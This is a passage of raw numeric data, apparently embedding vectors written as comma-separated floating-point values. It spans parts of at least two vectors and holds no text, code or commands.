35998,-0.0038524708,-0.002451165,-0.021159424,0.0020979135,0.0016907875,0.0072062737,-0.0016666491,0.010090439,0.021568377,0.0031968027,-0.0095148645,0.024422958,0.019556448,0.013299249,-0.019541534,-0.0015104844,0.0059976694,0.0034029016,0.017309777,-0.032530315,0.0031389496,0.0044278633,0.011294581,-0.010445933,0.008560817,-0.042512838,0.004267039,0.013231295,0.010087422,0.005587409,-0.0012311316,0.013604817,0.0077862022,0.006845428,-0.009960918,0.003944858,-0.0034583511,0.0009802427,-0.0050327457,0.008535221,0.0018047554,-0.0059972196,-0.008710271,0.008530859,0.02919178,0.04268881,0.046785068,0.009925145,0.025540749,0.026533613,0.004880717,-0.019900542,-0.0018419746,0.01405138,0.0033131558,0.007847111,0.01387782,-0.013627874,-0.024016256,0.032787714,-0.012712616,-0.012117909,0.0016218382,0.010881213,0.0055913795,-0.003296106,-0.0019564668,0.04487163,-0.0015556131,-0.0077184225,0.040388014,0.0094451485,0.0028330635,-0.0013914359,0.01576806,0.0014291971,0.024001515,0.03338165,-0.0006978601,-0.021603161,-0.0013566624,0.0011706144,-0.00076638954,0.01447877,0.017357444,-0.013555766,-0.015782403,0.033940274,-0.012662746,0.01774462,-0.0045574787,0.008894431,-0.01941499,0.013624584,0.014912394,0.039999377,0.006633319,-0.00835035,0.0052397847,0.011632767,0.0018525623,0.00927069,0.035270546,0.004740318,-0.018390678,0.013069423,-0.016484572,0.0071775657,0.00020598657,0.011046639,0.019770946,0.023555852,-0.00004845451,-0.01310932,0.005372897,0.0009492643,0.012781834,-0.011067124,0.021211183,0.00810244,-0.014262033,0.010015184,-0.0118166935,-0.027194934,-0.012836789,0.010804419,-0.0173402,-0.0010620632,-0.006052192,-0.009334817,0.002330427,0.01788875,-0.0017923815,-0.011857825,-0.02073641,0.015505878,-0.050825596,0.007258849,-0.0015608335,-0.00026675264,0.006671331,-0.00030294416,0.014838736,0.017263982,-0.012243783,-0.002043797,-0.010286278,0.00012840379,0.013077981,-0.018583195,-0.031016607,-0.003166131,0.0018534163,0.015503965,0.008614196,-0.024685806,-0.0030258303,0.00925547,0.0041249846,0.0017450837,0.0006255159,-0.009958114,-0.010733764,-0.023024525,0.0012725517,0.04041697,-0.023224505,-0.00064265385,0.009261502,0.012496553,-0.00229822,-0.000090858935,0.0038276943,0.0071749296,-0.006112603,-0.005558361,0.013483887,-0.0055858195,0.0054323226,-0.00020256247,-0.011080353,-0.022548523,0.017590629,0.0036341988,0.008221088,-0.017701527,0.005989799,-0.006057339,-0.017010167,0.008054875,-0.028569922,0.023574203,-0.012602846,0.018599596,0.011292141,0.022972418,0.032681566,-0.024542974,0.0010084971,0.025544122,-0.00054245756,-0.007448109,-0.014174985,0.012280936,-0.009619656,0.014011037,0.02361163,-0.0043449937,0.03110577,-0.00021577363,0.0072426074,-0.016421895,-0.024402233,0.010937103,0.002097954,0.008496721,-0.02321385,0.006935741,-0.00017038528,-0.012705757,-0.013106773,-0.0011690934,0.03005629,0.011338943,0.024970595,-0.014933532,-0.0145383375,0.0109609375,0.024588747,-0.023726612,0.012932536,0.018302545,0.008735407,-0.0061016087,-0.012251294,0.008559248,-0.010975292,-0.0079089515,-0.01307109,-0.022349302,-0.0039558625,-0.0061952183,-0.0028641738,-0.005025833,-0.06628871,0.032203447,0.016268488,-0.0026934573,0.001738125,0.005174214,-0.016758649,-0.012868125,-0.008261787,0.009632515,-0.007813431,0.0034367135,0.004209983,0.006860123,-0.0018653985,-0.010460375,0.012355798,-0.007195722,-0.0040988033,0.0014575175,-0.0019764134,0.040648144,-0.0013641451,0.0010910663,0.003270421,-0.009204238,-0.0038364066,-0.0017362299,0.006242797,0.01300521,0.0066276207,0.0064357296,-0.00816551,-0.016120132,0.017127069,0.018350717,0.0055980943,0.033380494,0.0030204079,-0.03611332,-0.0059059444,0.013449171,0.017434357,-0.0133516835,0.016605983,0.0097876545,-0.010227754,-0.032743745,-0.03808287,-0.024087649,0.02027768,0.0009418939,-0.007304964,0.0055370633,0.0046657426,0.009477373,0.007141335,0.001225904,0.037880998,-0.00012424181,-0.017763697,-0.014596985,0.015695779,-0.026008563,-0.0055143936,0.019856982,0.007955172,0.025800105,-0.010789943,0.009966915,0.004575157,-0.010432797,-0.0050510727,-0.012699463,-0.009963286,0.017512724,-0.01847357,-0.0026902636,0.007643098,-0.005606249,0.025041882,0.020492148,0.016410185,-0.009681301,0.005913418,0.023167191,-0.004161086,0.004427761,0.0253519,0.014029591,0.022504997,0.0046094074,0.015316059,-0.0077734254,-0.0019207918,0.01603989,-0.0090647945,-0.008424357,0.004574282,0.018218748,-0.0043518674,0.004160179,0.010741612,-0.010494947,0.0040439647,0.017310273,-0.010340788,-0.01388021,0.0031748153,-0.0078478865,0.015974566,0.016423497,0.03089632,0.030711967,0.008478101,0.005677023,0.015595103,0.01591674,-0.012991512,-0.013112752,-0.025800576,-0.017885633,-0.005372094,0.013697979,0.0013995486,-0.002103005,-0.00029524555,0.0009359549,-0.012926146,-0.0065761297,-0.037328485,0.034192093,0.024613604,0.028581733,0.0016879038,0.019430535,0.0022161226,0.007814971,-0.014628077,0.002579796,-0.009246568,-0.037245188,-0.011623714,-0.009962955,0.0011465165,0.034507666,-0.0051525347,-0.010371529,-0.008230592,-0.022638379,-0.012836836,-0.016027622,0.016140757,-0.0066813235,-0.00392036,0.010779082,0.02759272,0.003534081,-0.0063509764,0.007895601,0.0131654795,0.020484488,0.0053578843,-0.0008984493,-0.024022657,0.004944127,0.010146259,-0.013873287,-0.0029775607,-0.029937252,-0.022357846,-0.0011660598,0.010546565,-0.008070994,-0.0192447,-0.0017125716,0.036415726,0.012466956,-0.014711303,-0.012016783,-0.02402609,0.0066389698,-0.015457118,0.007212481,-0.015444762,0.0057891356,0.008572146,-0.007821231,0.0049762456,-0.0386529,0.0018638278,-0.0061733304,0.012745448,0.014222059,-0.02237477,-0.008631244,0.004647882,0.0009840428,0.016537672,0.014281264,-0.021236312,0.0014547345,-0.007092967,0.016139293,0.010858899,0.037942942,0.0084625855,-0.013483033,0.0047715604,0.020244697,0.01030748,0.015641477,0.02180519,0.094609104,0.030534307,-0.0082922485,0.015039156,0.01816266,0.01111242,0.03832441,0.0038909125,0.025781294,0.0023423724,0.005459415,-0.00790303,0.0030069398,-0.014072356,-0.012091234,0.027528476,-0.0021027015,-0.0038919018,-0.010814523,0.006931121,0.0037799345,-0.010347982,-0.01553172,-0.010442187,0.0148814395,-0.05337312,0.007040509,0.03918555,-0.0019353096,0.009149353,0.011148032,0.033702098,0.026180735,0.004536302,-0.023087325,0.0009284672,0.016626894,-0.012476331,-0.008524865,-0.0050660465,-0.0025149917,0.015108048,0.006603697,-0.027109388,-0.030423991,0.009129387,0.0007795627,-0.003766798,0.00333489,0.004964207,0.010886461,0.0023477837,0.023410618,0.014422955,0.009320469,-0.006793387,-0.008376533,-0.00583872,-0.014728073,-0.0030987833,0.04350425,-0.017566446,-0.004527544,0.027408432,0.0088077495,0.01544142,-0.025347212,-0.03052105,-0.024807526,-0.016407253,0.029001005,-0.027116066,0.003738772,0.01088832,-0.016299225,0.025426943,-0.011042651,-0.021894874,0.017174192,-0.013038956,0.010952123,0.017923672,-0.0024827386,-0.00006808191,0.015821183,0.030238818,0.002781078,0.0008974349,0.0066789673,0.007214368,0.0056536067,0.023912128,-0.0038023754,-0.02052851,-0.015663097,0.0030240242,0.031230297,-0.016547548,0.01444929,0.010857594,0.0012012402,-0.0009776332,0.008149328,0.019393826,-0.0012193971,0.021482076,0.030410435,0.046109393,0.008706156,0.013423322,0.008086668,0.010962313,0.009745315,0.0029194055,-0.016931647,-0.0011764391,-0.023647496,-0.026478402,0.019803964,-0.013300468,0.0004570084,-0.0019339563,0.023255168,0.03745368,-0.0013981572,0.026094694,-0.0011444878,0.025862092,-0.009176697,-0.005141049,0.006220255,-0.03300848,-0.014952258,0.0012474854,-0.0025463738,0.01331866,0.034978364,0.017150342,-0.0036176445,-0.0039087962,0.012448826,0.0011589022,-0.0059677074,0.007360514,-0.0022190262,-0.0138449045,0.02463434,-0.006327317,0.012641119,-0.0038488877,0.004883102,-0.017217351,0.016104078,-0.030812388,-0.00046575838,-0.0036082324,0.002111522,0.007815431,-0.011337131,-0.0074538067,0.00976681,0.015178968,0.008476902,-0.03951748,0.015041731,0.012471684,0.0034852095,-0.01290709,0.026039613,0.04067724,0.0017604053,-0.0054532,-0.005689381,0.007964911,-0.008614048,-0.020112542,0.010331087,-0.0060604624,-0.0066711796,-0.015983853,0.01694052,0.011026838,-0.021294447,0.039501015,0.0065205586,-0.010552253,0.0066682776,-0.0015217873,-0.0059603048,0.03692384,-0.015224459,0.03598123,-0.00910139,0.019224154,-0.0038041999,0.0029254244,-0.027262943,0.0485651,-0.018776499,-0.035979204,-0.016529733,-0.0062223547,0.0016644732,-0.007536122,0.02258145,-0.01590907,0.011987512,-0.010201237,-0.009111324,-0.0115195215,0.020458719,0.009091833,-0.0185416,-0.017845176,0.011676799,0.002339628,-0.013244528,-0.000048768372,-0.019030081,0.010939676,0.0047719246,-0.017879251,-0.00479272,0.00031466605,-0.008637997,-0.016562104,-0.022087596,0.014979588,0.010552636,-0.016007394,-0.015598402,-0.000087685694,-0.01600171,-0.013141245,-0.008829998,-0.013890245,0.0046331948,0.01296749,-0.008545218,0.01260642,-0.001687792,-0.012516417,0.010365488,0.0102657555,-0.016950812,0.0022952347,0.01871307,-0.008169811,-0.022915084,-0.02560221,-0.00042342712,0.03117509,-0.06130377,-0.032202538,-0.021287931,-0.016399747,-0.011707332,0.010753786,-0.0008757051,-0.018569794,-0.002224139,-0.0026028412,0.0068851016,-0.0027132302,-0.0069925752,-0.00880839,0.025240034,-0.019195318,0.0067423717,-0.00022614167,-0.00984323,-0.006726786,-0.01590893,-0.0009858961,-0.031690475,0.0003908364,-0.016778482,-0.017752543,-0.015388434,0.019125897,0.014828364,-0.014625404,0.032858446,-0.020603506,0.0033436976,-0.0014076731,0.015207974,-0.002619143,0.037464775,-0.048846338,-0.0064744195,0.025282636,-0.013055198,-0.012153424,0.0068152095,-0.013998587,-0.06386361,-0.03489087,0.032888994,-0.025155822,-0.050538912,-0.016816953,0.00047658465,-0.01114271,-0.01291628,-0.0059078876,-0.0015026683,-0.002522381,0.0011881541,0.014483388,-0.0114439055,0.00040054752,-0.0064423312,-0.0040368624,-0.0077167163,-0.0013124732,0.009565072,0.001117571,0.00029487765,0.0022524807,0.021936629,-0.02793103,0.0077230935,0.0028232532,0.007488902,0.002324982,0.015826602,-0.030271815,-0.017457709,-0.0254341,0.0053638374,-0.013481836,0.009641726,0.009246418,-0.016601946,-0.0050732475,-0.017084049,0.12275222,-0.0033223967,-0.016491018,-0.0036697043,0.0036204737,-0.028353432,0.003592819,0.016185228,-0.010842196,0.006542081,-0.0047266902,-0.0058755963,-0.001621823,0.0158821,-0.0031733143,-0.00309868,0.010339399,0.15770805,0.012124331,-0.000926125,0.018478187,0.00047536378,0.025731783,0.008899128,-0.013371681,-0.06014275,0.0295884,-0.02666308,0.013376441,-0.014966144,0.008577365,0.012814192,-0.00172502,-0.023069073,0.008143974,0.015581077,0.001116197,-0.01808216,-0.0057783453,-0.015596246,0.0072842143,-0.0072687347,-0.0020600215,0.032759942,0.00933787,0.006031175,-0.0026506677,-0.0006980417,0.010631825,0.012035171,0.0125784725,0.0047430005,0.022316748,0.0054959645,0.012560552,0.01585918,-0.0038307505,0.0031361214,-0.022789462,0.038019933,-0.0030129526,0.0070034717,-0.021426227,0.0040707104,-0.0013933548,-0.0038601994,0.00992278,-0.008124749,-0.00067257165,0.0026731188,0.0012170088,-0.0075621316,-0.025614712,-0.011276721,-0.003983385,0.0041091368,-0.021495897,0.0002193672,0.0053639663,-0.00040715185,0.021489296,-0.00017030504,-0.012989167,-0.006922493,-0.015528013,0.016435161,0.013636718,0.0012275887,0.009601928,-0.0019931262,-0.022639556,0.014136387,0.0040914286,-0.0135869915,0.0040558674,0.016993674,-0.010255893,0.002987808,-0.01175084,-0.030655837,-0.02455736,0.0004022309,0.018133773,0.015406505,-0.00056801655,0.008165892,0.0040384424,0.0010434516,-0.017307242,0.0059503806,0.031389948,0.022089258,-0.008272818,0.00033606566,-0.021857074,-0.0113525195,0.006869323,0.016160827,-0.026125934,-0.0072819274,0.0003633378,-0.016506545,0.016014257,0.020653658,-0.02322989,-0.008375765,0.0011188671,0.000573822,-0.008573054,0.014921576,0.0017518683,-0.0015288146,0.022994371,0.010178226,0.021057742,-0.0055431454,-0.0114330305,-0.04859156,-0.0070555247,-0.015463893,0.0058680815,-0.0040122997,-0.004847318,0.00762703,-0.0049864454,0.021286355,0.013416718,-0.0026514581],[0.029691854,-0.01790147,0.006552781,-0.012732969,0.0066235987,-0.0022949697,0.0030701868,0.010668707,0.0025523528,0.0071186842,0.002874062,0.028226411,0.003997848,-0.0027379268,-0.0140151065,-0.0037081672,-0.015476095,0.0015723131,-0.009013791,-0.01918916,0.006185574,-0.012992879,0.008104683,0.022086026,0.024042897,0.015758313,0.005986862,-0.0002291093,-0.0022937688,-0.023024678,0.0135431625,0.017501513,-0.00010022261,-0.0009157709,0.035867978,0.011393756,0.011807128,0.01543242,0.0016616038,-0.027463209,0.029713077,0.00421127,-0.013741855,0.014239546,0.00248672,-0.010339479,-0.006030784,-0.016333556,-0.0059873373,0.021463396,-0.022898553,0.01204852,0.0012489291,0.013604004,-0.0027439396,-0.0034674662,-0.016394386,-0.010453561,0.015112021,-0.028622206,0.002761229,0.009150512,0.01508475,-0.008424491,0.019347839,0.001829218,0.01052388,-0.023040129,-0.008573768,0.0131585095,0.04213515,0.004769634,-0.0076591275,-0.009932325,-0.006988316,0.017174432,0.00083353184,0.011519733,-0.012660385,-0.012669638,-0.046021916,0.019279202,0.0073866937,-0.003324106,0.004495739,-0.011750255,-0.0043817884,0.010245017,0.01971351,-0.011477375,-0.009205595,0.014091583,0.011890788,0.018955827,-0.0054739537,0.016433636,0.019658674,0.00785022,-0.016558507,-0.028687015,-0.00043003252,-0.019292066,-0.033896316,0.006554308,-0.0032659338,-0.003544656,-0.031952813,0.034573477,-0.012234556,0.014613196,0.0006807352,0.00278402,0.00836079,0.0035216175,0.002542952,-0.014506779,-0.0053626476,0.020930203,-0.012277752,0.019061446,0.016015368,-0.023820948,0.015560073,0.015312827,-0.014331925,-0.0054747853,-0.022550575,0.004390836,-0.028850194,0.0055556777,-0.0048024226,0.011098432,-0.019993665,-0.0009035813,0.0057946164,-0.0037680594,0.012755274,0.0025423965,0.0076110144,0.00516651,0.019471578,0.012444126,0.011690871,0.017980264,-0.0067744493,0.008321488,0.003132389,0.006931618,0.020427557,-0.00051334244,0.0006674888,-0.0038901106,-0.008492328,0.003317461,-0.0044786516,0.0038472102,-0.014604129,0.0016465826,0.008966586,0.00568867,0.0040548597,-0.022221135,-0.0077444357,0.027003966,-0.010135146,-0.016564006,-0.010188819,0.01929059,-0.013783889,0.0076817814,0.00095965306,0.00421643,-0.007695495,-0.023199726,-0.011272584,-0.016005313,-0.0060412292,-0.012077644,0.0069136005,0.032934733,-0.006426166,0.029977502,0.0016288364,-0.04000281,0.0014914101,-0.0023211094,0.0048768236,0.01590876,0.013040702,-0.024351705,-0.0047469023,0.00400293,-0.017042885,0.013140744,-0.008958685,-0.014971161,-0.023181329,0.06692411,-0.004539518,-0.004360554,0.016095567,-0.009619389,-0.0035715725,-0.021651153,-0.017805856,0.002660198,-0.011683649,0.008313651,0.016109314,-0.024345376,-0.01048293,0.012520788,0.024449566,0.012290228,0.020022713,-0.09245382,0.029179033,0.022744263,-0.00016939107,0.010795175,0.003403204,-0.002239068,-0.020003604,0.0051781633,-0.0072422675,0.0072968444,0.017570049,-0.019593403,-0.0013161708,-0.019631417,0.029976958,0.026702913,-0.025104877,-0.01366779,-0.012114485,-0.02607033,0.0066449405,0.015250124,0.016778506,0.0015053864,-0.009861175,0.0008691582,0.028297672,0.0068540107,-0.016784748,-0.017207494,-0.0029257836,0.0110914,0.0025075204,0.004071962,-0.023415385,-0.034498792,0.0033978142,0.04241088,0.011673267,-0.006238523,0.0019181932,-0.0050799237,0.008644975,-0.0021722578,0.017992944,0.013973404,0.004316404,0.009569284,0.038645428,0.014804868,0.023854328,-0.025353013,0.00042936066,-0.005930933,-0.029074727,-0.0057789017,0.017235551,-0.027521417,0.021563932,-0.0014720443,0.0036075336,0.008164241,-0.0102651,0.020931643,-0.009986648,0.017542128,-0.02072263,-0.028127102,0.0010560257,-0.0040143165,0.030033812,0.00859502,0.0069156387,0.0068460745,0.001780682,-0.015270094,0.037777305,0.015563661,-0.012019539,-0.0046764007,-0.029141152,0.022318278,0.016728584,-0.006218583,-0.0011911079,-0.0072126654,0.01608298,-0.023138234,0.00401735,-0.019297773,-0.019881837,-0.002906111,-0.015325894,0.0024836855,-0.013433515,-0.00018075062,0.0017129758,0.020221232,0.023582492,0.016830785,-0.025502104,-0.030647097,-0.0070213345,0.005154836,0.0061829183,-0.016374087,-0.004686813,-0.0042421613,-0.024503238,-0.020624066,0.011171637,0.014860164,-0.004695793,0.025902517,-0.00059738965,-0.009169845,0.015292999,0.008513397,-0.015513846,0.015484739,-0.02155899,0.013016372,0.015750742,0.03251133,-0.0054722647,0.0031074462,-0.010327779,-0.0049104304,-0.0042102574,0.017700251,-0.0074401023,-0.004642735,0.019874005,-0.017910777,-0.015611612,0.02701514,-0.014233016,0.0019593672,-0.010792856,-0.020892946,-0.008516436,-0.01658665,-0.013747974,-0.0014996442,0.028249262,-0.015185146,0.020952072,-0.021163572,0.04701733,0.013483627,-0.006911593,-0.00989479,-0.003421176,-0.0013768965,0.017300192,0.0145144835,0.00566433,-0.019879784,-0.00119567,-0.008632314,-0.016621817,0.034399334,-0.012264506,-0.0003955816,-0.029243374,0.0009382745,-0.009294414,-0.010509406,0.0050857873,0.006935908,-0.0131935505,-0.004179336,0.010674629,0.027156426,-0.0036916342,-0.010833913,-0.020171873,-0.021203244,0.005110036,-0.011338269,0.011416456,-0.013283241,0.002000522,0.02616519,0.0006564968,0.009762411,0.0037217573,0.007880459,-0.024154592,-0.0024863519,-0.0073039024,0.022365285,-0.012389396,0.033692118,0.005850726,-0.0090355445,-0.0074268174,0.01287662,0.015585457,0.002965549,-0.03329204,0.011346822,-0.018564692,0.023701115,0.013186016,-0.016796818,0.009404299,0.017480616,0.02395056,0.033116505,-0.024120042,0.010400437,0.004362755,0.018812329,0.0049897004,-0.00007866127,-0.027809352,0.0022116941,-0.007896081,0.021782273,-0.007733995,0.005282024,0.020685494,-0.008858663,0.0118615655,-0.048245233,-0.004573663,0.042903055,0.027049277,0.02309087,-0.009672798,0.006566368,-0.016187165,-0.0033109137,0.014987642,0.012571404,0.0016738925,-0.027483514,0.002999079,0.016452452,0.010806023,-0.02953484,-0.005604734,-0.01327637,0.0067649186,-0.016174262,-0.0023791,-0.007075765,-0.018636722,0.0055897115,-0.006339766,-0.012322871,0.0046375757,-0.0033968943,-0.0061938562,-0.02883758,0.0033794611,0.029481994,-0.0014236972,0.007870599,-0.011531414,-0.0038786868,-0.0047518997,0.0072042886,0.00004317632,-0.018896153,-0.0152878715,0.03212109,0.0077030994,-0.009243876,-0.0065188166,-0.000117359516,-0.0023681528,0.009140542,0.012931899,-0.021337057,-0.0060559944,0.019690553,0.0024926958,-0.0006227905,0.0026161405,-0.04016788,-0.025220346,0.015859198,0.01654572,0.004525965,0.038849235,0.014421019,0.016173992,-0.0016968405,0.019801505,0.016115287,0.0012460093,0.0017446921,-0.0027000303,-0.016714243,0.022877248,0.018856468,-0.0042360886,-0.01272784,0.011608098,-0.028211238,0.0077918973,0.005066511,0.01178463,0.000681367,-0.02478019,0.0046677003,0.020244405,-0.009310961,-0.004864439,-0.02399523,-0.0008649627,-0.0054688635,0.001979588,0.041859884,0.000009795547,-0.034180287,-0.03065204,-0.0096334545,-0.010644946,0.0045497944,0.002433001,-0.014659682,0.0048962412,-0.0010258082,-0.011601136,-0.0027765941,0.011986696,-0.008430246,-0.0054101036,0.0064825094,-0.00084305776,-0.000103059276,0.00076719315,-0.011403429,-0.01531856,-0.012162386,-0.034271084,-0.020479022,-0.0027837276,0.020261502,0.012214408,-0.013236222,0.0008859533,-0.004501963,0.006481456,0.0059088655,-0.0006384242,0.029732276,-0.012343897,-0.008604314,0.0003419518,-0.008331137,0.016180215,0.012960116,0.0112532815,0.016551893,0.019559158,-0.0072943945,0.0025138299,0.0057136333,-0.006790055,0.013211863,-0.0013708329,-0.030301496,-0.0043991376,0.0032216713,-0.0074244044,0.010357757,-0.0151016405,0.0037754828,0.010557119,-0.011428454,0.005424013,0.014670073,0.00312229,-0.006136963,-0.022300659,-0.0067140763,-0.010502463,0.01570776,-0.0025918998,0.007194567,-0.02030756,0.009642365,0.0027791562,-0.011327862,0.02783297,0.005919042,0.009717223,0.00939151,0.029805675,0.021341532,-0.02110745,-0.0115964,0.025628168,-0.014281429,0.004973882,-0.0023649554,-0.012644771,-0.00987548,0.02944845,0.028469946,-0.005353111,0.006358398,0.012605669,-0.015326979,0.016591595,0.010389217,0.0089974925,0.0099140825,0.0075751483,-0.0026572307,-0.0041404967,0.0058810413,-0.026515154,-0.006988019,0.041153878,-0.0075199963,0.009186309,0.0046861554,-0.016215993,0.022191018,-0.012698908,-0.0135677075,-0.06750631,0.005007653,0.027561821,0.0015224916,-0.020630449,0.050174285,-0.024512285,0.028591046,0.0013703181,-0.0042329123,0.000984779,0.006111492,0.032662638,0.0065692062,0.026646452,0.022775121,-0.00084055203,-0.019799579,0.0002855723,-0.046651255,-0.0067493734,0.0134999715,0.012244818,0.005166247,0.0096887415,0.008920911,0.012545938,0.012542474,-0.00080979033,-0.020305768,0.0027397347,0.020876499,0.0015543168,0.016028073,-0.025491714,0.0063985777,-0.006596082,0.0011154921,-0.015332319,-0.013595654,0.012701276,-0.021153808,-0.048322655,-0.018438477,-0.0011468958,0.019244364,-0.008971764,0.013272431,-0.01295751,0.0046594604,0.002471379,0.0021569524,0.010936838,-0.021261666,-0.007174155,-0.016717892,-0.0355702,0.013398261,-0.0030092995,-0.019083299,-0.023438618,0.016686814,0.010823476,-0.0052204044,-0.0038612136,0.020119892,0.018319432,0.0015033743,0.014652119,-0.013199065,-0.0028319145,0.01729586,-0.002686659,0.012293667,0.0019714145,0.039815497,0.003411335,-0.014579909,0.0009558591,-0.006492679,0.030751677,-0.018838564,-0.015392148,0.01061584,-0.014391084,-0.021966586,0.022911796,-0.008436032,-0.012852242,-0.012399396,-0.013979583,0.00060334307,-0.013811716,-0.004573951,-0.009393253,0.0042858315,-0.0014877535,-0.03602858,-0.008879364,0.0043797954,0.026819047,-0.018364938,-0.02073065,0.008523348,-0.008774044,0.0083670085,-0.020209301,-0.014604673,-0.014014393,0.04212802,-0.04875241,0.02852702,0.008316525,-0.016622325,0.0020431813,0.019696796,0.008769781,-0.014046063,0.0114521,0.002398735,0.016673686,0.039219294,0.028844474,0.0008569699,-0.022922086,-0.0037859525,-0.0014342084,-0.014390247,-0.01571503,0.010321642,0.022035595,0.001828092,-0.019668039,-0.01159748,-0.023301626,-0.0018461894,-0.011002646,-0.02652924,-0.001593141,-0.013204734,0.0064132484,0.0050142948,-0.01954474,0.009917887,0.03126925,0.027678883,-0.0018918226,0.0058133905,0.005889234,0.016877774,0.011828035,-0.0063484064,-0.019865867,-0.020693418,-0.02456329,0.018020054,-0.029445266,-0.000995471,-0.01610896,-0.01353389,-0.017493114,-0.028520858,0.00768964,0.0043562697,-0.0043355934,0.014243847,-0.039835095,0.025522053,0.0069892188,0.023015235,0.001071593,0.0048623024,-0.018540427,-0.00013288608,-0.008834046,-0.019453978,-0.0064227213,-0.0112402355,-0.0062780585,-0.016144743,0.005362725,-0.02004176,-0.014792292,0.0023575136,-0.008591155,0.0031425348,0.0126044685,-0.0050560688,0.026284734,-0.024444705,-0.0033125163,0.017581327,0.008832289,-0.025950672,0.006301647,0.0070957253,0.019873723,0.021794504,0.005572239,-0.0068494617,0.025697205,0.0071271122,-0.02142892,0.010597064,0.00878049,-0.00039765978,-0.014639235,0.0030936154,-0.016441682,-0.017478004,0.006670185,-0.004542086,0.00715197,0.019142551,0.017083699,0.001110806,-0.013511286,-0.008539091,-0.012460313,-0.014875634,0.0023757562,0.010908862,-0.0069480147,0.00073343987,0.007679673,-0.0038475015,0.004592369,0.015695358,0.0037693547,0.006213747,-0.01844501,-0.00782128,-0.009498896,-0.026850728,-0.00363557,-0.00054371805,-0.0021454054,-0.003513747,0.008251535,-0.004284479,0.0034226896,0.023643952,-0.012193052,-0.020296188,0.0046647666,-0.011686703,0.0056135734,0.0041572102,-0.028780624,0.00032738125,0.023036119,-0.06414658,0.017799592,-0.027760472,0.010410053,0.0024437194,-0.033598088,-0.028236216,-0.0137747815,-0.0035007535,0.022474783,-0.0016498099,0.005402309,-0.0018794242,0.011330333,-0.004367069,0.019113833,0.008648456,0.020095898,0.024266766,0.012037005,0.009567805,-0.008247967,0.018250821,-0.003944153,-0.015067313,-0.016084561,-0.0046303943,0.0049609337,0.019676,-0.019253412,0.02635564,0.008954901,-0.0031993582,0.0126864,-0.025886869,-0.010767712,0.017246265,-0.011703453,-0.010317583,-0.009618965,0.013699192,-0.00042278532,-0.01137541,0.011957132,0.00678133,-0.038002163,0.037130456,0.012043205,-0.023166632,-0.028861703,-0.0068475497,-0.02112091,-0.01846989,0.05059748,0.0050953757,0.008292759,-0.015322264,0.032351118,-0.004593895,0.0021748978,-0.016966436,-0.01701865,0.020062486,0.010735089,-0.011594961,0.0042376253,0.008043392,0.0056548472,-0.0019762532,0.0005436141,-0.010319146,0.008004799,-0.002947006,-0.010939587,0.014433717,0.016956909,0.037488624,-0.0062541533,0.007308418,0.0048094387,-0.0061178696,0.006783047,-0.019039301,-0.015622868,-0.010492478,-0.00061441073,0.008256298,-0.025366286,0.016879411,-0.0007437152,-0.017728038,0.0074512996,0.00047852576,0.008394637,-0.02977043,0.016106425,-0.0020649512,-0.0004169054,0.023334766,-0.0057647256,-0.0007664573,-0.00012772308,0.009724442,0.030676648,-0.0024880439,0.01912754,-0.0014160987,-0.01828208,0.013624615,-0.028135708,-0.010562361,0.013656706,-0.038337402,0.012048285,-0.007231935,-0.014855579,0.0028506722,-0.020910604,-0.011046368,0.006408843,0.015222617,-0.0089376485,-0.021371925,-0.012246717,0.010514031,-0.017171288,0.0059033316,-0.029275723,0.009999067,-0.020413648,0.022401985,0.0048212884,-0.0028426643,-0.002036261,0.020236988,-0.015124178,-0.019002287,-0.0060700183,0.011699266,0.00014935218,0.00425865,-0.0021419178,0.004959089,0.018121384,0.0035186892,0.03791288,-0.001859423,-0.025245652,-0.016382517,-0.03556256,0.00068706396,-0.0010259763,0.0043770266,0.039653067,0.0222113,-0.0057350365,0.018072253,0.019383097,0.017498752,-0.011615841,-0.023096234,-0.012749283,-0.0054804557,0.06884423,0.0032085134,-0.0020752065,0.017452413,-0.0012555654,0.0040155835,-0.0027708658,0.024840305,0.036888864,-0.009522212,-0.017485622,0.015220641,-0.026227828,0.02197167,0.0018193863,-0.004479907,0.018249672,0.0018299076,-0.016032265,-0.011154439,0.0045613493,0.02241668,-0.008984405,-0.016483396,-0.024480822,0.005878717,0.0031443099,-0.0019194466,-0.017162591,0.009072392,0.006093874,-0.002455901,0.0014583572,-0.007561532,0.00027330773,-0.0043507675,-0.023054661,0.014180083,-0.0047455835,-0.024306228,-0.012205299,0.019032007,-0.009230394,-0.0067305258,-0.0024477413,0.0061896164,-0.004195276,-0.03700637,-0.028184943,-0.008739911,-0.039027777,-0.011648149,0.0026385845,-0.0131255,-0.0121078575,0.020247608,0.016258465,0.008193143,0.035805315,0.012868451,0.0025001836,-0.017554976,0.015093655,0.008720395,0.010306018,-0.0020369624,0.014496731,-0.002462739,-0.007530166,-0.004429489,-0.009703841,-0.0064397743,0.0069827153,0.01546481,-0.015719905,0.0008523942,-0.0028205102,0.004794954,0.0049914364,-0.0010054953,-0.010579457,0.015623528,-0.023901291,0.008900878,0.010968519,-0.0037769745,-0.036719758,-0.012327569,-0.0015180598,-0.030748468,0.009320366,-0.009086363,-0.009321228,-0.010378894,-0.0087582385,-0.0056546764,-0.007884194,-0.005616678,-0.011832208,-0.01541839,0.020033404,-0.032844365,0.012342309,0.014007173,0.005505829,-0.0041829813,0.0044235354,-0.019134402,0.015774626,0.0003731165,0.0010190303,-0.020641062,0.024583403,-0.02393759,0.028787915,-0.011924563,-0.03192951,0.022513788,-0.012630923,-0.0020444489,-0.022611257,-0.031481925,0.0010481538,0.0094186235,0.017295567,0.015733382,0.020416223,0.021715637,-0.00197052,0.002044821,-0.018327925,0.007858169,-0.022032542,0.0028094216,0.014390941,-0.008810801,-0.0012114714,-0.015107744,-0.022840308,-0.021504711,-0.020878142,0.007787229,-0.0029147642,-0.011183827,-0.028954705,0.020103646,0.023874326,-0.01092454,0.024775416,0.029821329,-0.01077748,-0.0026192372,0.0029794693,-0.008339121,-0.0076015606,-0.003295109,0.0030152814,0.0007541165,-0.012594215,-0.011018121,-2.2035839e-7,0.027610328,0.0016853188,-0.005167544,0.008630017,-0.034881417,-0.010337913,0.031892043,-0.014466661,-0.042649854,0.01728702,-0.017684456,0.0042650322,-0.007650883,-0.0042187343,-0.0061374004,0.024097031,0.0021526385,0.020706661,-0.007186101,0.015529972,-0.02118598,-0.035036676,-0.0061493455,-0.001539801,-0.03065289,-0.042188793,0.008300829,-0.009564398,0.041360125,0.012161279,0.007568438,-0.021747004,-0.005118133,-0.0012518652,-0.040568214,-0.0040386952,-0.0026708937,-0.0046464363,-0.0032608346,0.0014973804,0.0027817495,-0.0044497456,0.008938325,-0.003844157,0.003418447,-0.00038419568,0.031384923,-0.001104365,-0.009630985,0.00094720727,-0.0159626